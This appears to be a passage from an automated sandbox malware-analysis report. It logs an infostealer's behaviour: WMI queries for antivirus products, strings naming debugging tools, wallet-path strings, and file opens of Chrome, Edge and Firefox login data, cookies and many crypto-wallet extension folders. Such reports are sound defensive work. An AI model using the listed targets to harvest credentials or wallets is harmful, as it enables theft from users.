                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008ACBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_008ACBEA
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00642517 GetTimeZoneInformation,6_2_00642517
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: svchost.exe, 00000029.00000002.2372420603.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe
                          Source: svchost.exe, 00000029.00000002.2372420603.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lordpe.exe
                          Source: d2cb36d600.exe, 0000000B.00000003.2292963780.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2375048066.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292886987.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000002.2376937453.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2297401624.0000000003AE3000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292588728.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2352961493.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2298105996.0000000003AE6000.00000004.00000800.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2292678383.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d2cb36d600.exe, 0000000B.00000003.2354295558.0000000001333000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: svchost.exe, 00000029.00000002.2372420603.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regmon.exe
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 0.2.file.exe.890000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 6.2.skotes.exe.600000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.skotes.exe.600000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000006.00000003.2004346887.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.1443119669.0000000004690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1416758119.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: d2cb36d600.exe PID: 7656, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 9f237e29d5.exe PID: 3060, type: MEMORYSTR
                          Source: Yara matchFile source: 00000029.00000003.2360437408.00000000029F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2350989316.0000000001240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.2372633132.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2360789090.00000000050A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: d2cb36d600.exeString found in binary or memory: d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":
                          Source: d2cb36d600.exeString found in binary or memory: Wallets/ElectronCash
                          Source: d2cb36d600.exeString found in binary or memory: Jaxx Liberty
                          Source: d2cb36d600.exeString found in binary or memory: window-state.json
                          Source: d2cb36d600.exe, 0000000B.00000003.2271451706.00000000013AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\
                          Source: d2cb36d600.exeString found in binary or memory: ExodusWeb3
                          Source: d2cb36d600.exeString found in binary or memory: %appdata%\Ethereum
                          Source: d2cb36d600.exe, 0000000B.00000003.2375048066.000000000131C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                          Source: d2cb36d600.exe, 0000000B.00000003.2270396851.000000000132B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
